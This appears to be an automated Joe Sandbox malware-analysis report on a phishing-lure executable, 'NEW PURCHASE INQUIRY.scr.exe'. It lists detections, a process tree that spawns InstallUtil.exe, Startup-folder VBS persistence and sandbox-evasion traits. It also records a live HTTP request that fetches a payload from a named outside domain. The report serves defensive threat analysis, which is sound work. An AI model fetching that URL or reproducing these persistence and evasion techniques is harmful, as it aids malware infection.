Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NEW PURCHASE INQUIRY.scr.exe

Overview

General Information

Sample name:NEW PURCHASE INQUIRY.scr.exe
Analysis ID:1586491
MD5:a9bc0fad0b1a1d6931321bb5286bf6b7
SHA1:716972de3a984b6b842af2cefdf324898179e6c2
SHA256:c211e844c192fe91ad5b3ec3b4288392d475797126dd0600ef4a4351d840b58f
Tags:exescruser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • NEW PURCHASE INQUIRY.scr.exe (PID: 7156 cmdline: "C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe" MD5: A9BC0FAD0B1A1D6931321BB5286BF6B7)
    • InstallUtil.exe (PID: 6564 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
      • WerFault.exe (PID: 6660 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6564 -s 1148 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.2203400840.0000000006950000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000000.00000002.2180881403.0000000002C4C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000000.00000002.2190175430.000000000466E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000000.00000002.2190175430.0000000003D17000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          Process Memory Space: NEW PURCHASE INQUIRY.scr.exe PID: 7156JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            0.2.NEW PURCHASE INQUIRY.scr.exe.466e368.4.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.NEW PURCHASE INQUIRY.scr.exe.6950000.9.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.NEW PURCHASE INQUIRY.scr.exe.6950000.9.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  0.2.NEW PURCHASE INQUIRY.scr.exe.466e368.4.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    0.2.NEW PURCHASE INQUIRY.scr.exe.3ff7dc8.2.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      Click to see the 1 entries

                      Data Obfuscation

                      barindex
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe, ProcessId: 7156, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CharSet.vbs
                      No Suricata rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: NEW PURCHASE INQUIRY.scr.exeAvira: detected
                      Source: https://www.new.eventawardsrussia.com/wp-includes/Hniyg.datAvira URL Cloud: Label: malware
                      Source: C:\Users\user\AppData\Roaming\CharSet.exeAvira: detection malicious, Label: HEUR/AGEN.1308518
                      Source: C:\Users\user\AppData\Roaming\CharSet.exeReversingLabs: Detection: 68%
                      Source: NEW PURCHASE INQUIRY.scr.exeReversingLabs: Detection: 68%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Roaming\CharSet.exeJoe Sandbox ML: detected
                      Source: NEW PURCHASE INQUIRY.scr.exeJoe Sandbox ML: detected
                      Source: NEW PURCHASE INQUIRY.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 5.23.51.54:443 -> 192.168.2.5:49704 version: TLS 1.2
                      Source: NEW PURCHASE INQUIRY.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdby source: InstallUtil.exe, 00000002.00000002.3286585840.0000000005520000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: InstallUtil.exe, 00000002.00000002.3286585840.0000000005520000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: InstallUtil.exe, 00000002.00000002.3286585840.0000000005520000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: InstallUtil.exe, 00000002.00000002.3281415391.0000000001024000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdbeT source: InstallUtil.exe, 00000002.00000002.3281415391.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.pdb! source: InstallUtil.exe, 00000002.00000002.3281415391.0000000001024000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ?"oC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000002.00000002.3281275095.0000000000B98000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: @"o.pdb source: InstallUtil.exe, 00000002.00000002.3281275095.0000000000B98000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2204307012.0000000006B00000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: ((.pdb source: InstallUtil.exe, 00000002.00000002.3281275095.0000000000B98000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000002.00000002.3281415391.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2204307012.0000000006B00000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.pdbI source: InstallUtil.exe, 00000002.00000002.3281415391.0000000001024000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdbX(R source: InstallUtil.exe, 00000002.00000002.3281275095.0000000000B98000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2203921004.0000000006A80000.00000004.08000000.00040000.00000000.sdmp, NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2190175430.000000000466E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000002.00000002.3281415391.0000000001024000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2203921004.0000000006A80000.00000004.08000000.00040000.00000000.sdmp, NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2190175430.000000000466E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.pdb source: InstallUtil.exe, 00000002.00000002.3281415391.0000000001024000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbh source: InstallUtil.exe, 00000002.00000002.3281415391.0000000001024000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: o8C:\Windows\InstallUtil.pdb= source: InstallUtil.exe, 00000002.00000002.3281275095.0000000000B98000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 00000002.00000002.3281415391.0000000001024000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\InstallUtil.pdbb source: InstallUtil.exe, 00000002.00000002.3281415391.0000000001024000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: InstallUtil.exe, 00000002.00000002.3281415391.0000000001024000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: InstallUtil.pdbt source: InstallUtil.exe, 00000002.00000002.3281415391.0000000001024000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb source: InstallUtil.exe, 00000002.00000002.3286585840.0000000005520000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: InstallUtil.pdb.NETFrameworkv4.0.30319InstallUtil.exe source: InstallUtil.exe, 00000002.00000002.3286585840.0000000005520000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000002.00000002.3281275095.0000000000B98000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb"- source: InstallUtil.exe, 00000002.00000002.3281415391.0000000001024000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: InstallUtil.exe, 00000002.00000002.3281415391.0000000001024000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000002.00000002.3281415391.0000000001024000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 4x nop then jmp 0693D28Fh0_2_0693D080
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 4x nop then jmp 0693CCB7h0_2_0693C8A7
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 4x nop then jmp 0693CCB7h0_2_0693C8C8
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 4x nop then jmp 0693D28Fh0_2_0693D070
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: global trafficHTTP traffic detected: GET /wp-includes/Hniyg.dat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.new.eventawardsrussia.comConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /wp-includes/Hniyg.dat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.new.eventawardsrussia.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: www.new.eventawardsrussia.com
                      Source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2180881403.0000000002C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2203921004.0000000006A80000.00000004.08000000.00040000.00000000.sdmp, NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2190175430.000000000466E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2203921004.0000000006A80000.00000004.08000000.00040000.00000000.sdmp, NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2190175430.000000000466E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2203921004.0000000006A80000.00000004.08000000.00040000.00000000.sdmp, NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2190175430.000000000466E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2203921004.0000000006A80000.00000004.08000000.00040000.00000000.sdmp, NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2190175430.000000000466E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2180881403.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp, NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2203921004.0000000006A80000.00000004.08000000.00040000.00000000.sdmp, NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2190175430.000000000466E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2203921004.0000000006A80000.00000004.08000000.00040000.00000000.sdmp, NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2190175430.000000000466E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2180881403.0000000002C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.new.eventawardsrussia.com
                      Source: NEW PURCHASE INQUIRY.scr.exe, CharSet.exe.0.drString found in binary or memory: https://www.new.eventawardsrussia.com/wp-includes/Hniyg.dat
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownHTTPS traffic detected: 5.23.51.54:443 -> 192.168.2.5:49704 version: TLS 1.2

                      System Summary

                      barindex
                      Source: 0.2.NEW PURCHASE INQUIRY.scr.exe.3c628f8.5.raw.unpack, U6hxraNfFQ5vN4uaID.csLarge array initialization: d1eCgJsPs: array initializer size 360784
                      Source: initial sampleStatic PE information: Filename: NEW PURCHASE INQUIRY.scr.exe
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_012223680_2_01222368
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_012223780_2_01222378
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_01222D030_2_01222D03
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_05BDE4780_2_05BDE478
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_05BDE4690_2_05BDE469
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_05BD979C0_2_05BD979C
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_05BDB7180_2_05BDB718
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_05BDB7080_2_05BDB708
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_05BD16880_2_05BD1688
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_05BD96E80_2_05BD96E8
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_05BD16780_2_05BD1678
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_067E4ED80_2_067E4ED8
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_067E8C1B0_2_067E8C1B
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_067E72A80_2_067E72A8
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_067EF3D80_2_067EF3D8
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_067ED1780_2_067ED178
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_067E4EC80_2_067E4EC8
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_067EAFC00_2_067EAFC0
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_067E17B80_2_067E17B8
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_067E17A90_2_067E17A9
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_067ED1670_2_067ED167
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_068125C50_2_068125C5
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_068125C80_2_068125C8
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_0683E0980_2_0683E098
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_0683D6800_2_0683D680
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06836A080_2_06836A08
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_0683DE700_2_0683DE70
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_068370C00_2_068370C0
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_068369FB0_2_068369FB
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_0693EC5B0_2_0693EC5B
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_069392380_2_06939238
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06946A980_2_06946A98
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_069401BF0_2_069401BF
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_069417E00_2_069417E0
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_069415DB0_2_069415DB
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_069415E80_2_069415E8
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06946A880_2_06946A88
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_069400060_2_06940006
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_069400400_2_06940040
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_0694B1A80_2_0694B1A8
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06A7DE0F0_2_06A7DE0F
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06A79C000_2_06A79C00
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06A77A080_2_06A77A08
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06A7F4280_2_06A7F428
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06A700070_2_06A70007
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06A700400_2_06A70040
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06A7E1470_2_06A7E147
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06A73F770_2_06A73F77
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06A7099E0_2_06A7099E
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06A779FF0_2_06A779FF
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06A7A9480_2_06A7A948
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06CEFB400_2_06CEFB40
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06CEE6E00_2_06CEE6E0
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06CD00400_2_06CD0040
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06CD00060_2_06CD0006
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06CEE1380_2_06CEE138
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012310202_2_01231020
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012310302_2_01231030
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6564 -s 1148
                      Source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2180881403.0000000002C4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs NEW PURCHASE INQUIRY.scr.exe
                      Source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2204307012.0000000006B00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs NEW PURCHASE INQUIRY.scr.exe
                      Source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2179858426.0000000000DBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs NEW PURCHASE INQUIRY.scr.exe
                      Source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2180881403.0000000002EFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGdkjzj.exe" vs NEW PURCHASE INQUIRY.scr.exe
                      Source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2203921004.0000000006A80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs NEW PURCHASE INQUIRY.scr.exe
                      Source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2190175430.000000000466E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs NEW PURCHASE INQUIRY.scr.exe
                      Source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2201566442.0000000006660000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamePrtjuoptn.dll" vs NEW PURCHASE INQUIRY.scr.exe
                      Source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000000.2034701231.00000000008F4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNEW PURCHASE INQUIRY.exeJ vs NEW PURCHASE INQUIRY.scr.exe
                      Source: NEW PURCHASE INQUIRY.scr.exeBinary or memory string: OriginalFilenameNEW PURCHASE INQUIRY.exeJ vs NEW PURCHASE INQUIRY.scr.exe
                      Source: NEW PURCHASE INQUIRY.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.NEW PURCHASE INQUIRY.scr.exe.3c628f8.5.raw.unpack, U6hxraNfFQ5vN4uaID.csCryptographic APIs: 'CreateDecryptor'
                      Source: 2.2.InstallUtil.exe.5480000.6.raw.unpack, K10o3rBccZMwxgHKJGF.csCryptographic APIs: 'CreateDecryptor'
                      Source: 2.2.InstallUtil.exe.5480000.6.raw.unpack, K10o3rBccZMwxgHKJGF.csCryptographic APIs: 'CreateDecryptor'
                      Source: 2.2.InstallUtil.exe.5480000.6.raw.unpack, K10o3rBccZMwxgHKJGF.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.NEW PURCHASE INQUIRY.scr.exe.6b00000.11.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.NEW PURCHASE INQUIRY.scr.exe.6b00000.11.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.NEW PURCHASE INQUIRY.scr.exe.6b00000.11.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 0.2.NEW PURCHASE INQUIRY.scr.exe.6b00000.11.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                      Source: 0.2.NEW PURCHASE INQUIRY.scr.exe.6b00000.11.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 0.2.NEW PURCHASE INQUIRY.scr.exe.6b00000.11.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.NEW PURCHASE INQUIRY.scr.exe.6b00000.11.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.NEW PURCHASE INQUIRY.scr.exe.6b00000.11.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 0.2.NEW PURCHASE INQUIRY.scr.exe.6b00000.11.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.NEW PURCHASE INQUIRY.scr.exe.6b00000.11.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: classification engineClassification label: mal100.expl.evad.winEXE@4/3@1/1
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CharSet.vbsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6660:64:WilError_03
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\3fbcccb6-3cc1-4f4b-b8e3-0357eb18a36fJump to behavior
                      Source: NEW PURCHASE INQUIRY.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: NEW PURCHASE INQUIRY.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: NEW PURCHASE INQUIRY.scr.exeReversingLabs: Detection: 68%
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeFile read: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe "C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe"
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
